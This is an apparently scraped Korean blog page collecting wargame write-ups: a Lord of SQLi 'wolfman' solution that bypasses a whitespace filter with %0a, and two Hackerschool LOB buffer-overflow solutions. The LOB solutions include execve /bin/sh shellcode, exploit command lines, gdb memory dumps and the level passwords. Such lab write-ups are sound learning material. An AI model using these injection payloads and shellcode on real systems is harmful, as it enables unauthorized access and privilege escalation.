반응형
반응형
반응형
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/ /i'$_GET[pw])) exit("No whitespace ~_~"); 
  $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
  if($result['id'== 'admin') solve("wolfman"); 
  highlight_file(__FILE__); 
?>
cs

 

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

 

공백을 필터링한다. 공백이 가능할 경우에는 1' or '1'='1' and id='admin 로 입력을 하면

 

query : select id from prob_wolfman where id='guest' and pw='1' or '1'='1' and id='admin'

가 되어서 admin으로 된다.

 

공백을 우회하는 방법은 여러가지가 있다. 아래 블로그를 참고했다.

https://binaryu.tistory.com/31

 

SQL Injection 공백 우회방법

SQL Injection 공격시 공백 문자 필터링시 우회 방법 1. Tab : %09 - no=1%09or%09id='admin' 2. Line Feed (\n): %0a - no=1%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - no=1%0dor%0did='admin' 4. 주석 :..

binaryu.tistory.com

그 중 %0a을 이용해서 공백 필터링을 우회할 수 있었다.

 

 

반응형
반응형


해커스쿨 LOB LEVEL6 [wolfman -> darkelf] 풀이


M4ndU




해커스쿨 LOB [wolfman -> darkelf] 풀이입니다.


ID | wolfman

PW | love eyuna


으로 로그인합니다.



\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.


$ bash2


그리고


$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합시다.




login: wolfman

Password:

[wolfman@localhost wolfman]$ bash2

[wolfman@localhost wolfman]$ ls -l

total 20

-rwsr-sr-x    1 darkelf  darkelf     12655 Feb 26  2010 darkelf

-rw-r--r--    1 root     root          721 Mar 29  2010 darkelf.c

[wolfman@localhost wolfman]$ cat darkelf.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkelf

        - egghunter + buffer hunter + check length of argv[1]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}


이번에는 argv[1]의 길이를 제안하네요. 48바이트를 넘기면 안되네요.
하지만 argv[2]를 이용한다면 해결됩니다.

argv[1] = 'print "\x90"*44+RET'`
argv[2] = 'python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`


[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\x90"*44+"\xff\xff\xff\xbf"'` `python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ gdb -c core -q
Core was generated by `./darkelf 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?릱릱릱릱릱릱릱릱릱릱'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffff in ?? ()
(gdb) x/1000x $esp
0xbffffac0:     0x00000000      0xbffffb04      0xbffffb14      0x40013868
(생략)
0xbffffc00:     0x2e003638      0x7261642f      0x666c656b      0x90909000
0xbffffc10:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc20:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc30:     0x90909090      0x90909090      0xffffff90      0x909000bf
0xbffffc40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc50:     0xc0319090      0x2f2f6850      0x2f686873      0x896e6962
0xbffffc60:     0x895350e3      0xb0c289e1      0x0080cd0b      0x00000000
(생략)

0xbffffc40을 리턴주소로 잡으면 되겠네요.

[wolfman@localhost wolfman]$ ./darkelf  `python -c 'print "\x90"*44+"\x40\xfc\xff\xbf"'` `python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱@??
bash$ my-pass
euid = 506
kernel crashed

성공입니다!
분명히 되야 하는데 안될땐 bash2를 다시 띄워서 하면 되더라구요.

그럼 다음 문제로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏ



반응형
반응형


해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이


M4ndU




해커스쿨 LOB [orc -> wolfman] 풀이입니다.


ID | orc

PW | cantata


으로 로그인합니다.



\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.


$ bash2


그리고


$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합시다.




login: orc

Password:

[orc@localhost orc]$ bash2

[orc@localhost orc]$ ls -l

total 20

-rwsr-sr-x    1 wolfman  wolfman     12587 Feb 26  2010 wolfman

-rw-r--r--    1 root     root          581 Mar 29  2010 wolfman.c

[orc@localhost orc]$ cat wolfman.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - wolfman

        - egghunter + buffer hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}



점점 조건들이 많아지네요...
환경변수 사용 불가능, 스택영역 사용

        // buffer hunter

        memset(buffer, 0, 40);


buffer의 값을 0으로 초기화 시켜서 사용할 수 없게 되었습니다.

하지만! 입력값의 크기 제한은 없죠.
쉘코드를 리턴주소 다음에 넣으면 됩니다!

dummy [44] + RET[4] + SHELLCODE

[orc@localhost orc]$ mkdir tmp
[orc@localhost orc]$ cp wolfman tmp/
[orc@localhost orc]$ cd tmp/
[orc@localhost tmp]$ ./wolfman `python -c 'print "A"*44+"\xff\xff\xff\xbf"+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA퓧릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?
          ?
Segmentation fault (core dumped)
[orc@localhost tmp]$ gdb -c core -q
Core was generated by `./wolfman AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA퓧릱릱릱릱릱릱릱릱릱?'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffff in ?? ()
(gdb) x/500x $esp
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae0:     0x90909090      0x6850c031      0x68732f2f      0x69622f68
(생략)
0xbffffc00:     0x00000000      0x00000000      0x36690000      0x2e003638
0xbffffc10:     0x6c6f772f      0x6e616d66      0x41414100      0x41414141
0xbffffc20:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc30:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc40:     0x41414141      0xffffff41      0x909090bf      0x90909090
0xbffffc50:     0x90909090      0x90909090      0x90909090      0x50c03190
0xbffffc60:     0x732f2f68      0x622f6868      0xe3896e69      0xe1895350
0xbffffc70:     0x0bb0c289      0x000080cd      0x00000000      0x00000000
(생략)

0xbffffc50으로 리턴주소를 설정하겠습니다.

[orc@localhost orc]$ ./wolfman `python -c 'print "A"*44+"\x50\xfc\xff\xbf"+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?퓧릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?
          ?
bash$ my-pass
euid = 505
love eyuna


성공입니다. 다음레벨로 GAZUAAAAAAAAAAAAAA


반응형

+ Recent posts